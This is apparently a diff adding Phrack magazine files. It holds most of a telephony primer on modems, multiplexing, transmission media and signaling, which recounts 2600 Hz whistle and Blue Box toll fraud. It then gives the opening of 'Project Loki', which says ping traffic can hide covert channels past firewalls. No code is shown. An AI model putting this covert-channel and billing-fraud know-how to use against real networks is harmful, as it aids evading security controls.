+   1. Data Terminal Equipment (DTE) is any digital (binary code) device,
+      such as a computer, a printer, or a digital fax.
+
+   2. Data Communications Equipment (DCE) are devices that establish,
+      maintain, and terminate a connection between a DTE and a facility.
+      They are used to manipulate the signal to prepare it for
+      transmission.  An example of DCE is a modem.
+
+   3. The transmission path is the communication facility linking DCEs
+      and DTEs.
+
+
+The Importance of Modems
+
+
+A pair of modems is required for most DTE-to-DTE transmissions made over
+the public network.
+
+The function of a modem is similar to the function of a codec, but in
+reverse. Codecs convert information that was originally in analog form
+(such as voice) into digital form to transmit it over digital
+facilities.  Modems do the opposite.  They convert digital signals to
+analog to transmit them over analog facilities.
+
+It continues to be necessary to convert analog signals to digital and
+then back again because the transmission that travels between telephone
+company COs is usually over digital facilities.  The digital signals
+travel from one telephone company Central Office to another over high
+capacity digital circuits.  Digital transmission is so superior to
+analog transmission that it is worth the time and expense of converting
+the analog signals to digital signals.
+
+Since computers communicate digitally, and most CO-to-CO facilities are
+digital, why then is it necessary to convert computer-generated digital
+data signals to analog before transmitting them?
+
+The answer is simple.  Most lines from a local Central Office to a
+customer's residence or business (called the local loop) are still
+analog because for many years, the phone company has been installing
+analog lines into homes and businesses.  Only very recently have digital
+lines begun to terminate at the end user's premises.
+
+It is one thing to convert a telephone company switch from analog to
+digital. It is quite another to rewire millions of individual customer
+sites, each one requiring on-site technician service.  This would
+require a massive effort that no institution or even industry could
+afford to do all at one time.
+
+In most cases, therefore, we are left with a public network that is part
+analog and part digital.  We must, therefore, be prepared to convert
+analog to digital and digital to analog.
+
+
+Modulation/Demodulation
+
+
+To transmit data from one DCE to another, a modem is required when any
+portion of the transmitting facility is analog.  The modem (modulater/
+demodulater) modulates and demodulates digital signals for
+transmission over analog lines.  Modulation means "changing the
+signals."  The digital signals are changed to analog, transmitted, and
+then changed back to digital at the receiving end.
+
+Modems always come in pairs-- one at the sending end and one at the
+receiving end.  Their transmission rates vary from 50 bps to 56 Kbps
+(Kilobits per second).
+
+
+Synchronous Versus Asynchronous
+
+
+There are two ways digital data can be transmitted:
+
+Asynchronous transmission sends data one 8-bit character at a time.  For
+example, typing on a computer sends data from the keyboard to the
+processor of the computer one character at a time. Start and stop bits
+attach to the beginning and end of each character to alert the receiving
+device of incoming information.  In asynchronous transmission, there is
+no need for synchronization.  The keyboard will send the data to the
+processor at the rate the characters are typed.  Most modems transmit
+asynchronously.
+
+Synchronous transmission is a method of sending large blocks of data at
+fixed intervals of time. The two endpoints synchronize their clocking
+mechanisms to prepare for transmission.  The success of the transmission
+depends on precise timing.
+
+Synchronous transmission is preferable when a large amount of data must
+be transmitted frequently.  It is better suited for batch transmission
+because it groups data into large blocks and sends them all at once.
+
+The equipment need for synchronous transmission is more expensive than
+for asynchronous transmission so a data traffic study must be made to
+determine if the extra cost is justified.  Asynchronous transmission is
+more cost effective when data communication is light and infrequent.
+
+
+Error Control
+
+
+The purpose of error control is to detect and correct errors resulting
+from data transmission.
+
+There are several methods of performing error control.  What most
+methods have in common is the ability to add an error checking series of
+bits at the end of a block of data that determines whether the data
+arrived correctly. If the data arrived with errors, it will contact the
+sending DTE and request the information be re-transmitted.  Today's
+sophisticated error checking methods are so reliable that, with the
+appropriate equipment, it is possible to virtually guarantee that data
+transmission will arrive error-free.  There are almost no reported cases
+of a character error in received faxes.
+
+Error control is much more critical in data communication than in voice
+communication  because in voice communication, if one or two of the 8000
+PCM signals per second arrive with an error, it will make almost no
+difference to the quality of the voice representation received.  But,
+imagine the consequences of a bank making a funds transfer and
+misplacing a decimal point on a large account.
+
+
+
+	.--------------.
+6	| Multiplexing |
+	`--------------'
+
+
+Function of Multiplexers
+
+Analog and digital signals are carried between a sender and receiver
+over transmission facilities.  It costs money to transmit information
+signals from Point A to Point B.  It is, therefore, of prime importance
+to budget conscious users to minimize transmission costs.
+
+The primary function of multiplexers is to decrease network facility
+line costs.
+
+Multiplexing is a technique that combines many individual signals to
+form a single composite signal.  This allows the transmission of
+multiple simultaneous calls over a single line.  It would cost a lot
+more money to have individual lines for each telephone than to multiplex
+the signals and send them over a single line.
+
+Typical transmission facilities in use today can transmit 24 to 30 calls
+over one line.  This represents a significant savings for the end user
+as well as for commercial long distance and local distance carriers.
+
+
+Bandwidth
+
+The bandwidth of a transmission medium is a critical factor in
+multiplexing. Bandwidth is the difference between the highest and lowest
+frequencies in a given range.  For example, the frequency range of the
+human voice is between 300 Hz and 3300 Hz.  Therefore, the voice
+bandwidth is
+
+           3300 Hz - 300 Hz  =  3000 Hz
+
+We also refer to the bandwidth of a transmission medium.  A transmission
+medium can have a bandwidth of 9600 Hz.  This means that it is capable
+of transmitting a frequency range up to 9600 Hz.  A medium with a large
+bandwidth can transmit more information and be divided into more
+channels than a medium with a small bandwidth.
+
+We will investigate three different methods of multiplexing:
+
+                Frequency Division Multiplexing (FDM)
+                Time Division Multiplexing (TDM)
+                Statistical Time Division Multiplexing (STDM)
+
+
+Frequency Division Multiplexing (FDM)
+
+FDM is the oldest of the three methods of multiplexing.  It splits up
+the entire bandwidth of the transmission facility into multiple smaller
+slices of bandwidth.  For example, a facility with a bandwidth of 9600
+Hz can be divided into four communications channels of 2400 Hz each.
+Four simultaneous telephone conversations can therefore be active on the
+same line.
+
+Logically, the sum of the separate transmission rates cannot be more
+than the total transmission rate of the transmission facility:  the 9600
+Hz facility could not be divided into five 2400 Hz channels because  5 x
+2400 is greater than 9600.
+
+Guard bands are narrow bandwidths (about 1000 Hz wide) between adjacent
+information channels (called frequency banks) which reduce interference
+between the channels.
+
+The use of FDM has diminished in recent years, primarily because FDM is
+limited to analog transmission, and a growing percentage of transmission
+is digital.
+
+
+Time Division Multiplexing (TDM)
+
+
+Time division multiplexing has two main advantages over frequency
+division multiplexing:
+
+           - It is more efficient
+           - It is capable of transmitting digital signals
+
+Instead of the bandwidth of the facility being divided into frequency
+segments, TDM divides the capacity of a transmission facility into short
+time intervals called time slots.
+
+TDM is slightly more difficult to conceptualize than FDM.  An analogy
+helps.
+
+The problem is
+
+      We must transport the freight of five companies from New York to
+      San Francisco.  Each company wants their freight to arrive on the
+      same day.  We must be as fair as we can to prevent one company's
+      freight from arriving before another company's.  The freight from
+      each company will fit into 10 boxcars so a total of 50 boxcars
+      must be sent.  Essentially, there are three different ways we can
+      accomplish this.
+
+        1. We can rent five separate locomotives and rent five
+           separate railway tracks and send each company's freight on
+           its own line.
+
+        2. We can rent five separate locomotives, but only one track and
+           send five separate trains along one line.
+
+        3. We can join all the boxcars together and connect them to one
+           engine and send them over a single track.
+
+Obviously the most cost effective solution is Number 3.  It saves us
+from renting four extra rail lines and four extra locomotives.
+
+To distribute the freight evenly so that each company's freight arrives
+at the same time, the could be placed in a pattern as illustrated below:
+
+  Company A + Company B + Company C + Company A + Company B + Company C . . .
+
+At San Francisco, the boxcars would be reassembled into the original
+groups of 10 for each company and delivered to their final destination.
+
+This is exactly the principle behind TDM.  Use one track (communication
+channel), and alternate boxcars (pieces of information) from each
+sending company (telephone or computer).
+
+In other words, each individual sample of a voice or data conversation
+is alternated with samples from different conversations and transmitted
+over the same line.
+
+Let's say we have four callers in Boston (1, 2, 3, and 4) who want to
+speak with four callers in Seattle (A, B, C, and D).  The task is to
+transmit four separate voice conversations (the boxcars) over the same
+line (the track).
+
+The voice conversations are sampled by PCM.  This breaks each
+conversation into tiny 8-bit packets.  For a brief moment, caller 1
+sends a packet to receiver A.  Then, caller 2 sends a packet to receiver
+B-- and so on.  The result is a steady stream of interleaved
+packets-- just like our train example except the boxcars stretch all
+across the country.  Notice that every fourth packet is from the same
+conversation.  At the receiving end, the packets are reassembled and
+sent to the appropriate receiver at the rate of 8000 samples per
+seconds.
+
+Remember that if the receiver hears the samples at the rate of 8000
+times per second, it will result in good quality voice reproduction.
+Therefore, the packets are transmitted fast enough so that every 1/8000
+of a second, a packet from each send arrives at the appropriate
+receiver.  In other words, each conversation is connected 8000 times per
+second-- enough to satisfy Nyquist's Theorem.
+
+In FDM the circuit was divided into individual frequency channels for
+use by each sender.  In contrast, TDM divides the circuit into
+individual time channels.  For a brief moment, each sender is allocated
+the entire bandwidth-- just enough time to send eight bits of
+information.
+
+
+TDM Time Slots
+
+
+Because a version of the TDM process (called STDM) is the primary
+switching technique in use today, it is important that this challenging
+concept be presented as clearly and understandably as possible.  Here is
+a closer look at TDM, emphasizing the "T"--which stands for time.
+
+Each transmitting device is allocated a time slot during which it is
+permitted to transmit.  If there are three transmitting devices, for
+example, there will be three time slots.  If there are four devices
+there will be four time slots.
+
+Two devices, one transmitting and one receiving, are interconnected by
+assigning them to the same time slot of a circuit.  This means that
+during their momentary shared time slot, the transmitting device is able
+to send a short burst of information (usually eight bits) to the
+receiving device.  During their time slot, they use the entire bandwidth
+of the transmission facility but only for a short period of time.  Then,
+in sequence, the following transmitting devices are allocated time slots
+during which they too use the whole bandwidth.
+
+Clock A and Clock B at either end of the transmission must move
+synchronously. They rotate in unison, each momentarily making contact
+with the two synchronized devices (one sender and one receiver).  For
+precisely the same moment, Clock A will be in contact with Sender 1 and
+Clock B will be in contact with Receiver 1, allowing one sample (8 bits)
+of information to pass through. The they will both rotate so that clock
+A comes into contact with Sender 2 and Clock B with Receiver 2.  Again,
+one sample of information will pass.  This process is repeated for as
+long as needed.
+
+How fast must the clocking mechanism rotate?  Again, the answer is
+Nyquist's theorem.  If a signal is sampled 8000 times per second, an
+accurate representation of voice will result at the receiving end.  The
+same theory applies with TDM.  If the clocking mechanism rotates 8000
+times per second, the rate of transfer from each sender and receiver
+must also be 8000 times per second.  This is so because every revolution
+of the two clocking mechanisms result in each input and output device
+making contact once.  TDM will not work if the clocking mechanism
+synchronization is off.
+
+Each group of bits from one rotation of the clocking mechanism is called
+a frame. One method for maintaining synchronization is inserting a frame
+bit at the end of each frame.  The frame bit alerts the demultiplexer of
+the end of a frame.
+
+
+Statistical Time Division Multiplexing (STDM)
+
+
+STDM is an advanced form of TDM and is the primary switching technique
+is use now.  The drawback of the TDM process is that if a device is not
+currently transmitting, its time slot is left unused and is therefore
+wasted.
+
+In contrast, is STDM, carrying capacity is assigned dynamically.  If a
+device is not transmitting, its time slot can be used by the other
+devices, speeding up their transmission.  In other words, a time slot is
+assigned to a device only if it has information to send.  STDM
+eliminates wasted carrying capacity.
+
+
+
+	.--------------------.
+7	| Transmission Media |
+	`--------------------'
+
+
+Voice and data information is represented by waveforms and transmitted
+to a distant receiver.  However, information does not just magically
+route itself from Point A to Point B.  It must follow some predetermined
+path.  This path is called a transmission medium, or sometimes a
+transmission facility.
+
+The type of transmission medium selected to join a sender and receiver
+can have a huge effect on the quality, price, and success of a
+transmission. Choosing the wrong medium can make the difference between
+an efficient transmission and an inefficient transmission.
+
+Efficient means choosing the most appropriate medium for a given
+transmission.  For example, the most efficient medium for transmitting a
+normal call from your home to your neighbor is probably a simple pair of
+copper wires.  It is inexpensive and it gets the job done.  But if we
+were to transmit 2-way video teleconferencing from Bombay to Burbank,
+one pair of wires might be the least efficient medium and get us into a
+lot of trouble.
+
+A company may buy all the right equipment and understand all the
+fundamentals, but if they transmit over an inappropriate medium, they
+would probably be better off delivering handwritten messages than trying
+to use the phone.
+
+There are a number of characteristics that determine the appropriateness
+of each medium for particular applications:
+
+                 - cost 
+                 - ease of installation 
+                 - capacity
+                 - rate of error
+
+In choosing a transmission medium, these and many other factors must be
+taken into consideration.
+
+
+Terminology
+
+
+The transmission media used in telecommunications can be divided into
+two major categories:  conducted and radiated.  Examples of conducted
+media include copper wire, coaxial cable, and fiber optics.  Radiated
+media include microwave and satellite.
+
+A circuit is a path over which information travels.  All of the five
+media serve as circuits to connect two or more devices.
+
+A channel is a communication path within a circuit.  A circuit can
+contain one or more channels.  Multiplexing divides one physical link
+(circuit) into several communications paths (channels).
+
+The bandwidth of a circuit is the range of frequencies it can carry.
+The greater the range of frequencies, the more information can be
+transmitted. Some transmission media have a greater bandwidth than
+others and are therefore able to carry more traffic.
+
+The bandwidth of a circuit is directly related to its capacity to carry
+information.
+
+Capacity is the amount of information that may pass through a circuit in
+a given amount of time.  A high capacity circuit has a large amount of
+bandwidth-- a high range of frequencies-- and can therefore transmit a 
+lot of information.
+
+Copper Cable
+
+Copper cable has historically been the most common medium.  It has been
+around for many years and today is most prevalent in the local loop--the
+connection between a residence or business and the local telephone
+company.
+
+Copper cables are typically insulated and twisted in pairs to minimize
+interference and signal distortion between adjacent pairs.  Twisting the
+wires into pairs results in better quality sound which is able to travel
+a greater distance.
+
+Shielded twisted pair is copper cable specially insulated to reduce the
+high error rate associated with copper transmission by significantly
+reducing attenuation and noise.
+
+Copper cable transmission requires signal amplification approximately
+every 1800 meters due to attenuation.
+
+Advantages of Copper Cable
+
+There is plenty of it and its price is relatively low.
+
+Installation of copper cable is relatively easy and inexpensive.
+
+
+Disadvantages of Copper Cable
+
+Copper has a high error rate.
+
+Copper cable is more susceptible to electromagnetic interference (EMI) and 
+radio frequency interference (RFI) than other media.  These effects can 
+produce noise and interfere with transmission.
+      
+Copper cable has limited bandwidth and limited transmission capacity.
+
+The frequency spectrum range (bandwidth) of copper cable is relatively low
+-- approximately one megahertz (one million Hz).  Copper circuits can be 
+divided into fewer channels and carry less information than the other media.
+
+
+Typical Applications of Copper Cable
+
+Residential lines from homes to the local CO (called the local loop).
+
+Lines from business telephone stations to an internal PBX.
+
+Coaxial Cable
+
+Coaxial cable was developed to provide a more effective way to isolate
+wires from outside influence, as well as offering greater capacity and
+bandwidth than copper cable.
+
+Coaxial cable is composed of a central conductor wire surrounded by
+insulation, a shielding layer and an outer jacket.
+
+Coaxial cable requires signal amplification approximately every 2000
+meters.
+
+
+Advantages of Coaxial Cable
+
+Coaxial cable has higher bandwidth and greater channel capacity than 
+copper wire.  It can transmit more information over more channels than 
+copper can.
+
+Coaxial cable has lower error rates.  Because of its greater insulation, 
+coaxial is less affected by distortion, noise, crosstalk (conversations 
+from adjacent lines), and other signal impairments.
+
+Coaxial cable has larger spacing between amplifiers.
+
+Disadvantages of Coaxial Cable
+
+Coaxial cable has high installation costs.  It is thicker and 
+less flexible and is more difficult to work with than copper wire.
+
+Coaxial cable is more expensive per foot than copper cable.
+
+
+Typical Applications
+
+      - Data networks
+
+      - Long distance networks
+
+      - CO-to-CO connections
+
+Microwave
+
+For transmission by microwave, electrical or light signals must be
+transformed into high-frequency radio waves.  Microwave radio transmits
+at the high end of the frequency spectrum --between one gigahertz (one
+billion Hz) and 30 GHz.
+
+Signals are transmitted through the atmosphere by directly aiming one
+dish at another.  A clear line-of-sight must exist between the
+transmitting and receiving dishes because microwave travels in a
+straight line.  Due to the curvature of the earth, microwave stations
+are spaced between 30 and 60 kilometers apart.
+
+To compensate for attenuation, each tower is equipped with amplifiers
+(for analog transmission) or repeaters (for digital transmission) to
+boost the signal.
+
+Before the introduction of fiber optic cable in 1984, microwave served
+as the primary alternative to coaxial cable for the public telephone
+companies.
+
+
+Advantages of Microwave
+
+
+Microwave has high capacity.  Microwave transmission offers greater
+bandwidth than copper or coaxial cable resulting in higher transmission
+rates and more voice channels.
+
+Microwave has low error rates.
+
+Microwave systems can be installed and taken down quickly and inexpensively. 
+They can be efficiently allocated to the point of greatest need in a
+network. Microwave is often used in rural areas because the microwave
+dishes can be loaded on trucks, moved to the desired location, and
+installed quickly.
+
+Microwave requires very little power to send signals from dish to dish
+because transmission does not spread out into the atmosphere.  Instead
+it travels along a straight path toward the next tower.
+
+Microwave has a low Mean Time Between Failures (MTBF) of 100,000
+hours-- or only six minutes of down time per year.
+
+Microwave is good for bypassing inconvenient terrain such as mountains
+and bodies of water.
+
+Disadvantages of Microwave
+
+
+Microwave is susceptible to environmental distortions.  Factors such as
+rain, snow, and heat can cause the microwave beam to bend and vary.
+This affects signal quality.
+
+Microwave dishes must be focused in a straight line-of-sight.  This can
+present a problem over certain terrain or in congested cities.
+Temporary physical line-of-sight interruptions, such as a bird or plane
+flying through the signal pathway, can result in a disruption of
+signals.
+
+Microwave usage must be registered with appropriate regulatory agencies.
+These agencies monitor and allocate frequency assignments to prevent
+systems from interfering with each other.
+
+Extensive use of microwave in many busy metropolitan areas has filled up
+the airwaves, limiting the availability of frequencies.
+
+
+Typical Applications
+
+      - Private networks
+
+      - Long distance networks
+
+
+Satellite
+
+
+Satellite communication is a fast growing segment of the
+telecommunications market because it provides reliable, high capacity
+circuits.
+
+In most respects, satellite communication is similar to microwave
+communication.  Both use the same very high frequency (VHF) radio waves
+and both require line-of-sight transmission.  A satellite performs
+essentially the same function as a microwave tower.
+
+However, satellites are positioned 36,000 kilometers above the earth in
+a geosynchronous orbit,  This means they remain stationary relative to a
+given position on the surface of earth.
+
+Another difference between microwave and satellite communications is
+their transmission signal methods.  Microwave uses only one frequency to
+send and receive messages.  Satellites use two different
+frequencies--one for the uplink and one for the downlink.
+
+A device called a transponder is carried onboard the satellite.  It
+receives an uplink signal beam from a terrestrial microwave dish,
+amplifies (analog) or regenerates (digital) the signal, then retransmits
+a downlink signal beam to the destination microwave dish on the earth.
+Today's satellites have up to 48 transponders, each with a capacity
+greater than 100 Mbps.
+
+Because of the long distance traveled, there is a propagation delay of
+1/2 second inherent in satellite communication.  Propagation delay is
+noticeable in phone conversations and can be disastrous to data
+communication.
+
+A unique advantage of satellite communication is that transmission cost
+is not distance sensitive.  It costs the same to send a message across
+the street as around the world.
+
+Another unique characteristic is the ability to provide
+point-to-multipoint transmission.  The area of the surface of the earth
+where the downlinked satellite signals can be received is called its
+footprint.  Information uplinked from the earth can be broadcast and
+retransmitted to any number of receiving dishes within the satellite's
+footprint.  Television broadcast is a common application of
+point-to-multipoint transmission.
+
+
+Advantages of Satellite Transmission
+
+
+Satellite transmission provides access to wide geographical areas (up to the 
+size of the satellite's footprint), point-to-multipoint broadcasting, a large 
+bandwidth, and is very reliable.
+
+
+Disadvantages of Satellite Transmission
+
+
+Problems associated with satellite transmission include: propagation delay, 
+licensing requirement by regulatory agencies security issue concerning the 
+broadcast nature of satellite transmission.  Undesired parties within a 
+satellites footprint may illicitly receive downlink transmission.
+
+Installation requires a satellite in orbit.
+
+
+Fiber Optics
+
+
+Fiber optics is the most recently developed transmission medium.  It
+represents an enormous step forward in transmission capacity.  A recent
+test reported transmission rates of 350 Gbps (350 billion bits), enough
+bandwidth to support millions of voice calls.  Furthermore, a recently
+performed record- setting experiment transmitted signals 10,000 Km
+without the use of repeaters, although in practice 80 to 300 Km is the
+norm.  Recall the need for repeaters every kilometer or so with copper
+wire and coaxial.
+
+Fiber optics communication uses the frequencies of light to send
+signals.  A device called a modulator converts electrical analog or
+digital signals into light pulses.  A light source pulses light on and
+off billions and even trillions of times per second (similar to a
+flashlight turned on and off-- only faster). These pulses of light are
+translated into binary code.  The positive light pulse represents 1; a
+negative light pulse (no light) represents 0.  Fiber optics is digital
+in nature.
+
+The light is then transmitted along a glass or plastic fiber about the
+size of a human hair.  At the receiving end, the light pulses are
+detected and converted back to electrical signals by photoelectric
+diodes.
+
+Advantages of Fiber Optics
+
+Fiber optics has an extremely high bandwidth.  In fact, fiber optic
+bandwidth is almost infinite, limited only by the ability of engineers
+to increase the frequency of the pulses of light.  Current technology
+achieves a frequency of 100 terahertz (one million billion).
+
+Fiber optics is not subject to interference or electromagnetic
+impairments as are the other media.
+
+Fiber optics has an extremely low error rate-- approximately one error
+per 1,000,000,000,000.
+
+Fiber optics has a low energy loss translating into fewer
+repeaters/regenerators per long distance transmission.
+
+Fiber is a glass and glass is made of sand.  There will never by a
+shortage of raw material for fiber.
+
+
+Disadvantages of Fiber Optics
+
+
+Installation costs are high for a fiber optic system.  Currently it
+costs approximately $41,000 per km to install a fiber optic system.  The
+expense of laying fiber is primarily due to the high cost of splicing
+and joining fiber.  The cost will almost certainly decrease dramatically
+as less expensive methods of splicing and joining fiber are introduced.
+
+A potential disadvantage of fiber optics results from its enormous
+carrying capacity.  Occasionally a farmer or construction worker will
+dig into the earth and unintentionally split a fiber optic cable.
+Because the cable can carry so much information, an entire city could
+lose its telephone communication from just one minor mishap.
+
+
+	.-----------.
+8	| Signaling |
+	`-----------'
+
+Types of Signals
+
+When a subscriber picks up the phone to place a call, he dials digits to
+signal the network.  The dialed digits request a circuit and tell the
+network where to route the call--a simple enough procedure for the
+caller.  But in fact, it involves a highly sophisticated maze of
+signaling to and from switches and phones to route and monitor the call.
+Signaling functions can be divided into three main categories.
+
+
+Supervisory
+
+      Supervisory signals indicate to the party being called and the CO
+      the status of lines and trunks--whether they are idle, busy, or
+      requesting service.  The signals detect and initiate service on
+      requesting lines and trunks.  Signals are activated by changes in
+      electrical state and are caused by events such as a telephone
+      going on-hook or off-hook. Their second function is to process
+      requests for telephone features such as call waiting.
+
+
+Addressing
+
+      Addressing signals determine the destination of a call.  They
+      transmit routing information throughout the network.  Two of the
+      most important are
+
+      Dial Pulse:     These address signals are generated by alternately
+                      opening and closing a contact in a rotary phone
+                      through which direct current flows.  The number of
+                      pulses corresponds to the number of the dialed
+                      digit.
+
+      Tone:           These address signals send a unique tone or
+                      combination of tones which correspond to the
+                      dialed digit.
+
+
+Alerting
+
+      Alerting signals inform the subscriber of call processing
+      conditions.. These signals include:
+
+           Dial tone
+           The phone ringing
+           Flashing lights that substitute for phone ringing
+           Busy signal
+
+Let's take a look at how signaling is used to set up a typical call over
+the public network.
+
+Step 1 -   Caller A goes off-hook
+
+Step 2 -   The CO detects a change in state in the subscriber's line.
+           The CO responds by sending an alerting signal (dial tone) to
+           caller A to announce that dialing may begin.  The CO marks
+           the calling line busy so that other subscribers can not call
+           into it.  If another subscriber attempts to phone caller A,
+           he will get the alerting busy signal.  Caller A dials the
+           digits using tones from the keypad or dial pulses from a
+           rotary phone.
+
+Step 3 -   The dialed digits are sent as addressing signals from caller
+           A to CO A
+
+Step 4 -   CO A routes the addressing signals to CO B.
+
+Step 5 -   Supervisory signals in CO B test caller B to determine if the
+           line is free.  The line is determined to be free.
+
+Step 6 -   CO B sends alerting signals to caller B, which causes caller
+           B's telephone to ring.
+
+
+This is an example of a local call which was not billed to the customer.
+If the call had been a billable, long distance call, it would have used
+a supervisory signal known as answer supervision.  When the receiving
+end of a long distance call picks up, it sends a signal to its local CO.
+The CO then sends an answer supervision signal to the caller's CO
+telling it that the phone was picked up and it is time to begin billing.
+
+
+Where on the Circuit Does Signaling Occur?
+
+There are only three places where signaling can occur: 
+
+      In-band means on the same circuit as voice, within the voice
+      frequency range (between 300 and 3400 Hz).
+
+      Out-of-band means on the same circuit as voice, outside of the
+      voice frequency range (3400 - 3700 Hz).
+
+      Common Channel Signaling (CCS) means signaling occurs on a
+      completely separate circuit.
+
+
+The frequency range of human voice is approximately 0 - 4000 Hz.
+However, most voice signals fall in the area between 300 and 3400 Hz.
+Therefore, to save bandwidth, telephones only recognize signals between
+300 and 3400 Hz. It is conceivable that someone with an extremely high
+voice would have difficulty communicating over the telephone.
+
+
+In-band and Out-of-band
+
+
+In-band signaling (300 to 3400 Hz) can take the form of either a single
+frequency tone (SF signaling) of a combination of tones (Dual Tone
+Multifrequency - DTMF).  DTMF is the familiar touch tone.
+
+Out-of-band signaling (3400 to 3700 Hz)  is always single frequency
+(SF).
+
+
+In other words, using the frequency range from 300 to 3700 Hz, there are
+three methods of signaling.
+
+      Method A:       In-band (300 to 3400 Hz) by a single frequency
+                      (SF)
+
+      Method B:       In-band (300 to 3400 Hz) by multifrequencies
+                      (DTMF)
+
+      Method C:       Out-of-band (3400 to 3700 Hz) by a single
+                      frequency (SF)
+
+
+Single Frequency (SF) Signaling
+
+Methods A and C are examples of Single Frequency (SF) signaling.  SF
+signaling is used to determine if the phone line is busy (supervision)
+and to convey dial pulses (addressing).
+
+Method A:  In-band SF signaling uses a 2600 Hz tone which is carried
+           over the frequency bandwidth of voice (remember the frequency
+           bandwidth of voice is between 300 and 3300 Hz), within the
+           speech path.  So as not to interfere with speech, it is
+           present before the call but is removed once the circuit is
+           seized and speech begins.  After the conversation is over, it
+           may resume signaling.  It does not, however, signal during
+           the call because it would interfere with voice which also may
+           transmit at 2600 Hz.  Special equipment prevents occasional
+           2600 Hz speech frequencies from accidentally setting off
+           signals.
+
+Method C:  To improve signaling performance, SF out-of-band signaling
+           was developed.  It uses frequencies above the voice frequency
+           range (within the 3400 to 3700 Hz bandwidth) to transmit
+           signals.
+
+
+The problem with Methods A and C is that they are easily susceptible to
+fraud. In the late 1960s, one of the most popular breakfast cereals in
+America had a promotion in which they packaged millions of children's
+whistles, one in each specially marked box.  Never did General Mills,
+the producer of the cereal, anticipate the fraud they would be party to.
+It turned out that the whistles emitted a pure 2600 Hz tone, exactly the
+tone used in Method A.  It did not take long for hackers to discover
+that if they blew the whistles into the phones while making a long
+distance phone call, it tricked the telephone company billing equipment
+and no charge was made.
+
+This trick grew into its own little cottage industry, culminating in the
+infamous mass produced Blue Boxes which played tones that fooled
+telephone billing equipment out of millions of dollars.
+
+
+Method B:  DTMF was introduced to overcome this fraud, as well as to
+           provide better signaling service to the customer.  Instead of
+           producing just one signaling frequency, DTMF transmits
+           numerical address information from a phone by sending a
+           combination of two frequencies, one high and one low, to
+           represent each number/letter and * and # on the dial pad.
+           The usable tones are located in the center of the voice
+           communication frequencies to minimize the effects of
+           distortion.
+
+Drawbacks to SF and DTMF Signaling
+
+There are drawbacks to both SF and DTMF signaling that are promoting
+their replacement in long distance toll circuits.  The most important is
+that these signals consume time on the circuit while producing no
+revenues.  Every electrical impulse, be it a voice conversation or
+signaling information, consumes circuit time.  Voice conversations are
+billable.  Signaling is not. Therefore, it is in the best interest of
+the phone carriers to minimize signaling.
+
+Unfortunately, almost half of all toll calls are not completed because
+the called party is busy, not available or because of CO blockage.
+Nevertheless, signals must be generated to attempt to set up, then take
+down the call. Signals are generated but no revenue is produced.  For
+incompleted calls, these signals compete with revenue producing signals
+(whose calls were completed) for scarce circuit resources.
+
+
+CCS introduced several benefits to the public network:
+
+      .    Signaling information was removed from the voice channel, so
+           control information could travel at the same time as voice
+           without taking up valuable bandwidth from the voice channel.
+
+      .    CCS sets up calls faster, reducing signaling time and freeing
+           up scarce resources.
+
+      .    It cost less than conventional signaling.
+
+      .    It improves network performance.
+
+      .    It reduces fraud.
+
+
+Signaling System 7  (SS7)
+
+Today the major long distance carriers use a version of CCS called
+Signaling System 7  (SS7).  It is a standard protocol developed by the
+CCITT, a body which establishes international standards.
+
+
+Common Channel Signaling (CCS)
+
+Common Channel Signaling (CCS) is a radical departure from traditional
+signaling methods.  It transmits signals over a completely different
+circuit than the voice information.  The signals from hundreds or
+thousands of voice conversations are carried over a single common
+channel.
+
+Introduced in the mid-1970s CCS uses a separate signaling network to
+transmit call setup, billing, and supervisory information.  Instead of
+sending signals over the same communication paths as voice or data, CCS
+employs a full network dedicated to signaling alone.
+
+Loop Start Versus Ground Start Signaling
+
+Establishing an electrical current connection with a CO can be done in
+several different ways.  Here are a few of the possibilities
+
+
+Loop Start
+
+Inside of the CO, there is a powerful, central battery that provides
+current to all subscribers.  Loop start is a method of establishing the
+flow of current from the CO to a subscriber's phone.
+
+
+The two main components of a loop start configuration are
+
+      The tip (also called the A line) is the portion of the line loop
+      between the CO and the subscriber's phone that is connected to the
+      positive, grounded side of the battery.
+
+      The ring (also called the B line) is the portion of the line loop
+      between the CO and the subscriber's phone that is connected to the
+      negative, ungrounded side of the battery.
+
+
+To establish a loop start connection with the CO, a subscriber goes
+off-hook. This closes a direct current (DC) path between the tip and
+ring and allows the current to flow in a loop from the CO battery to the
+subscriber and back to the battery.  Once the current is flowing, the CO
+is capable of sending alerting signals (dial tone) to the subscriber to
+begin a connection.
+
+The problem with loop start signaling is a phenomenon called glare that
+occurs in trunks between a CO and a PBX.  When a call comes into a PBX
+from CO trunk, the only way the PBX knows that the trunk circuit is busy
+is the ringing signal sent from the CO.
+
+Unfortunately the ringing signal is transmitted at six second intervals.
+For up to six seconds at a time, the PBX does not know there is a call
+on that circuit.  If an internal PBX caller wishes to make an outgoing
+call, the PBX may seize the busy trunk call at the same time.  The
+result is confused users on either end of the line, and the abandonment
+of both calls.
+
+Ground Start 
+
+Ground start signaling overcomes glare by immediately engaging a circuit
+seize signal on the busy trunk.  The signal alerts the PBX that the
+circuit is occupied with an incoming call and cannot be used for an
+outgoing call.
+
+Ground start is achieved by the CO by grounding the tip side of the line
+immediately upon seizure by an incoming call.  The PBX detects the
+grounded tip and is alerted not to seize this circuit for an outgoing
+call, even before ringing begins.
+
+Because ground start is so effective at overcoming glare, it is commonly
+used in trunks between the CO and a PBX.
+
+
+E & M
+
+E & M signaling is used in tie lines which connect two private telephone
+switches.  In E & M signaling, information is transmitted from one
+switch to another over two pairs of wires.  Voice information is sent
+over the first pair, just as it would be in a Loop Start or Ground Start
+trunk.  However, instead of sending the signaling information over the
+same pair of wires, it is sent over the second pair of wires.
+
+
+
+
+
diff --git a/phrack49/6.txt b/phrack49/6.txt
new file mode 100644
index 0000000..f00f573
--- /dev/null
+++ b/phrack49/6.txt
@@ -0,0 +1,201 @@
+                             .oO Phrack Magazine Oo.
+
+                          Volume Seven, Issue Forty-Nine
+                                     
+                                  File 06 of 16
+
+			        [ Project Loki ]
+
+		        whitepaper by daemon9 AKA route
+		       sourcecode by daemon9 && alhambra
+			     for Phrack Magazine
+		      August 1996 Guild Productions, kid
+
+	   comments to route@infonexus.com/alhambra@infonexus.com
+
+
+		--[ Introduction ]--
+
+
+	Ping traffic is ubiquitous to almost every TCP/IP based network and 
+subnetwork.  It has a standard packet format recognized by every IP-speaking
+router and is used universally for network management, testing, and 
+measurement.  As such, many firewalls and networks consider ping traffic 
+to be benign and will allow it to pass through, unmolested.  This project 
+explores why that practice can be insecure.  Ignoring the obvious threat of 
+the done-to-death denial of service attack, use of ping traffic can open up 
+covert channels through the networks in which it is allowed.
+
